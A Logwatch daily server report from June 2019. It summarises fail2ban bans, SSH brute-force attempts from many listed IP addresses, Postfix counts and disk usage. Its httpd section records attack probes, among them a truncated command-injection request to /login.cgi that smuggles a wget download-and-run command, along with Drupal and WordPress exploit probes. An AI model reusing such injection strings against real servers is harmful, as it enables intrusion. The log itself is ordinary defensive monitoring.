################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Thu Jun 6 04:42:08 2019 Date Range Processed: yesterday ( 2019-Jun-05 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [298:302] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ A total of 1 sites probed the server 176.58.124.134 Requests with error response codes 400 Bad Request /: 1 Time(s) /api/v1: 1 Time(s) /login.cgi?cli=aa%20aa%27;wget%20http://19 ... h%20/tmp/kh%27$: 1 Time(s) /robots.txt: 1 Time(s) /w00tw00t.at.ISC.SANS.DFind:): 1 Time(s) HTTP/1.1: 1 Time(s) mstshash=Administr: 1 Time(s) null: 1 Time(s) 404 Not Found /robots.txt: 33 Time(s) /berlin/apple-touch-icon.png: 4 Time(s) /wp-login.php: 3 Time(s) /,81.169.150.252: 1 Time(s) /.env: 1 Time(s) /.git/config: 1 Time(s) /admin/: 1 Time(s) /ads.txt: 1 Time(s) /home/verein: 1 Time(s) /protokolle/ergebnisprotokoll_mv_09.06.2017.pdf: 1 Time(s) /reader/2016_sose_konstanz_lang.pdf: 1 Time(s) 500 Internal Server Error /: 21 Time(s) //user/register/?element_parents=account/m ... mat=drupal_ajax: 2 Time(s) //webconfig.txt.php: 2 Time(s) /.git/: 1 Time(s) //administrator//webconfig.txt.php: 1 Time(s) //wp-admin/admin-post.php?swp_debug=load_o ... 20%22h1loo1%22;: 1 Time(s) /api/v1: 1 Time(s) /bremen/2014/indexeb91.html%253Fp=207: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: unknown (ks41.johan-chan.fr): 62 Time(s) unknown (120-88-46-226.snat21.hns.net.in): 54 Time(s) unknown (139.59.7.5): 51 Time(s) unknown (52.166.196.196): 51 Time(s) unknown (61.ip-176-31-191.eu): 50 Time(s) unknown (111.231.215.244): 48 Time(s) unknown (186.84.172.62): 48 Time(s) unknown (vps2.d3soft.ma): 48 Time(s) unknown (103.9.88.242): 46 Time(s) unknown (37.ip-51-68-143.eu): 46 Time(s) unknown (198.211.125.131): 42 Time(s) unknown (46.105.227.206): 42 Time(s) unknown (106.12.98.12): 40 Time(s) unknown (142.93.22.180): 39 Time(s) unknown (128.199.104.232): 37 Time(s) unknown (117.121.38.246): 36 Time(s) unknown (49.247.207.56): 36 Time(s) unknown (68.183.21.151): 34 Time(s) unknown (103.9.88.249): 32 Time(s) unknown (106.12.199.98): 27 Time(s) unknown (host81-130-149-101.in-addr.btopenworld.com): 23 Time(s) unknown (209.97.164.36): 18 Time(s) unknown (ip125.ip-54-38-5.eu): 17 Time(s) unknown (221.156.116.51): 12 Time(s) unknown (39.red-213-97-245.staticip.rima-tde.net): 8 Time(s) root (103.77.229.93): 6 Time(s) root (115.58.70.88): 6 Time(s) root (n119237104109.netvigator.com): 6 Time(s) unknown (host-31-6-136-153.dynamic.mm.pl): 6 Time(s) unknown (ns3077451.ip-188-165-242.eu): 6 Time(s) unknown (159.89.100.35): 5 Time(s) backup (37.ip-51-68-143.eu): 2 Time(s) unknown (193.32.163.89): 2 Time(s) www-data (46.105.227.206): 2 Time(s) backup (186.84.172.62): 1 Time(s) backup (39.red-213-97-245.staticip.rima-tde.net): 1 Time(s) games (49.247.207.56): 1 Time(s) gnats (37.ip-51-68-143.eu): 1 Time(s) irc (186.84.172.62): 1 Time(s) list (68.183.21.151): 1 Time(s) mail (142.93.22.180): 1 Time(s) man (37.ip-51-68-143.eu): 1 Time(s) mysql (117.121.38.246): 1 Time(s) mysql (49.247.207.56): 1 Time(s) postfix (103.9.88.242): 1 Time(s) postfix (117.121.38.246): 1 Time(s) postfix (186.84.172.62): 1 Time(s) postfix (ks41.johan-chan.fr): 1 Time(s) postgres (120-88-46-226.snat21.hns.net.in): 1 Time(s) proxy (186.84.172.62): 1 Time(s) root (103.9.88.242): 1 Time(s) root (218.92.0.154): 1 Time(s) smmsp (52.166.196.196): 1 Time(s) sshd (117.121.38.246): 1 Time(s) sshd (ks41.johan-chan.fr): 1 Time(s) sync (139.59.7.5): 1 Time(s) sync (52.166.196.196): 1 Time(s) temp (117.121.38.246): 1 Time(s) unknown (138.68.171.54): 1 Time(s) unknown (178.128.79.169): 1 Time(s) unknown (194.179.101.4): 1 Time(s) unknown (211.38.244.205): 1 Time(s) unknown (215.ip-51-255-174.eu): 1 Time(s) unknown (244.ip-164-132-230.eu): 1 Time(s) unknown (41.210.9.30): 1 Time(s) unknown (72.49.25.1): 1 Time(s) unknown (74.208.239.79): 1 Time(s) uucp (198.211.125.131): 1 Time(s) www-data (103.9.88.249): 1 Time(s) Invalid Users: Unknown Account: 975 Time(s) systemd-user: Unknown Entries: session closed for user root: 1 Time(s) session opened for user root by (uid=0): 1 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 6 Miscellaneous warnings 13.383K Bytes accepted 13,704 13.383K Bytes sent via SMTP 13,704 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 7 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 7 Total 4xx Rejects 100.00% ======== ================================================== 127 Connections 112 Connections lost (inbound) 127 Disconnections 1 Removed from queue 1 Sent via SMTP 2 SMTP dialog errors ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 3 Time(s) Failed logins from: 37.187.0.223 (ks41.johan-chan.fr): 2 times 46.105.227.206: 2 times 49.247.207.56: 2 times 51.68.143.37 (37.ip-51-68-143.eu): 4 times 52.166.196.196: 2 times 68.183.21.151: 1 time 103.9.88.242: 2 times 103.9.88.249: 1 time 103.77.229.93: 6 times 115.58.70.88 (hn.kd.ny.adsl): 6 times 117.121.38.246: 4 times 119.237.104.109 (n119237104109.netvigator.com): 6 times 120.88.46.226 (120-88-46-226.snat21.hns.net.in): 1 time 139.59.7.5: 1 time 142.93.22.180: 1 time 186.84.172.62 (dynamic-ip-1868417262.cable.net.co): 4 times 198.211.125.131: 1 time 213.97.245.39 (39.red-213-97-245.staticip.rima-tde.net): 1 time 218.92.0.154: 1 time Illegal users from: undef: 742 times 31.6.136.153 (host-31-6-136-153.dynamic.mm.pl): 6 times 37.187.0.223 (ks41.johan-chan.fr): 62 times 41.210.9.30 (adsl930.4u.com.gh): 1 time 46.105.227.206: 42 times 49.247.207.56: 36 times 51.68.143.37 (37.ip-51-68-143.eu): 46 times 51.255.174.215 (215.ip-51-255-174.eu): 1 time 52.166.196.196: 51 times 54.38.5.125 (ip125.ip-54-38-5.eu): 17 times 68.183.21.151: 34 times 72.49.25.1 (fl1-dsl-72-49-25-1.fuse.net): 1 time 74.208.239.79: 1 time 81.130.149.101 (host81-130-149-101.in-addr.btopenworld.com): 23 times 103.9.88.242: 46 times 103.9.88.249: 32 times 106.12.98.12: 40 times 106.12.199.98: 27 times 111.231.215.244: 48 times 117.121.38.246: 36 times 120.88.46.226 (120-88-46-226.snat21.hns.net.in): 54 times 128.199.104.232: 37 times 138.68.171.54: 1 time 139.59.7.5: 51 times 142.93.22.180: 39 times 159.89.100.35: 5 times 164.132.230.244 (244.ip-164-132-230.eu): 1 time 176.31.191.61 (61.ip-176-31-191.eu): 50 times 178.33.67.12 (vps2.d3soft.ma): 48 times 178.128.79.169: 1 time 186.84.172.62 (dynamic-ip-1868417262.cable.net.co): 48 times 188.165.242.200 (ns3077451.ip-188-165-242.eu): 6 times 193.32.163.89 (srv.eqaltech.su): 2 times 194.179.101.4 (4.red-194-179-101.customer.static.ccgg.telefonica.net): 1 time 198.211.125.131: 42 times 209.97.164.36: 18 times 211.38.244.205: 1 time 213.97.245.39 (39.red-213-97-245.staticip.rima-tde.net): 8 times 221.156.116.51: 12 times Users logging in through sshd: root: 176.94.82.115 (business-176-094-082-115.static.arcor-ip.net): 1 time **Unmatched Entries** Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (user,ssh-connection) [preauth] : 1 time(s) fatal: no matching cipher found: client aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,twofish-cbc,arcfour server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 1 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/vzfs 400G 241G 160G 61% / ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################